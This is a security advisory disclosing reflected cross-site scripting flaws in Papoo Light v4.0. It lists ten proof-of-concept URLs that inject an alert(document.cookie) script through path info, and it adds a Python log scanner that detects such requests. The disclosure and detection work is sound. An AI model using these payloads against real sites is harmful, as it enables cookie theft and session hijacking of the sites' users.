SSCHADV2011-014 - Multiple XSS vulnerabilities in Papoo Light Version
Advisory: | Multiple XSS vulnerabilities in Papoo Light Version |
Advisory ID: | SSCHADV2011-014 |
Author: | Stefan Schurtz |
Affected Software: | v4.0 |
Vendor URL: | |
Vendor Status: | fixed |
OSVDB-ID: | - |
======================
Vulnerability Description:
======================
The Papoo Light Version is prone to multiple XSS vulnerabilities.
==============
Technical Details:
==============
http://<target>/papoo/papoo_light/index.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/kontakt.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/inhalt.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forum.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/guestbook.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/account.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/login.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/index/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forumthread.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forum/"></a><script>alert(document.cookie);</script>
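An added example, not part of the original advisory: a Python check that scans access-log lines for the request pattern listed above, where markup characters follow one of the named scripts as path info. The combined log format, the `/papoo_light/` path marker and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Script names come from the advisory's URLs; the "/papoo_light/" marker is an assumption.
ENDPOINTS = ("index.php", "kontakt.php", "inhalt.php", "forum.php", "guestbook.php",
             "account.php", "login.php", "forumthread.php", "index", "forum")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters needed to close an attribute value and open a new tag.
MARKUP_RE = re.compile(r'[<>"\']')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_info(request_target):
    """Return the path info after a listed script if it contains markup, else None."""
    path = decode_fully(request_target.split("?", 1)[0])
    for ep in ENDPOINTS:
        _, found, extra = path.partition("/papoo_light/" + ep + "/")
        if found and MARKUP_RE.search(extra):
            return extra
    return None

def scan(log_lines):
    """Return 1-based numbers of the log lines whose request should be reviewed."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if m and suspicious_path_info(m.group(1)) is not None:
            hits.append(n)
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [12/Sep/2011:10:00:01 +0200] "GET /papoo/papoo_light/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Sep/2011:10:00:07 +0200] "GET /papoo/papoo_light/kontakt.php/%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5342',
    '192.0.2.44 - - [12/Sep/2011:10:00:09 +0200] "GET /papoo/papoo_light/forum/%2522%253E%253Cscript%253E HTTP/1.1" 200 4711',
    '192.0.2.10 - - [12/Sep/2011:10:00:12 +0200] "GET /papoo/papoo_light/forum/thread-12.html HTTP/1.1" 200 3300',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Ordinary path info such as the fourth sample line is not flagged; only trailing segments containing quote or angle-bracket characters, raw or percent-encoded, are reported.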
=====
Solution:
=====
Update to the latest version
================
Disclosure Timeline:
================
12-Sep-2011 – informed the developers
12-Sep-2011 – release date of this security advisory
12-Sep-2011 – response and fix by vendor
12-Sep-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======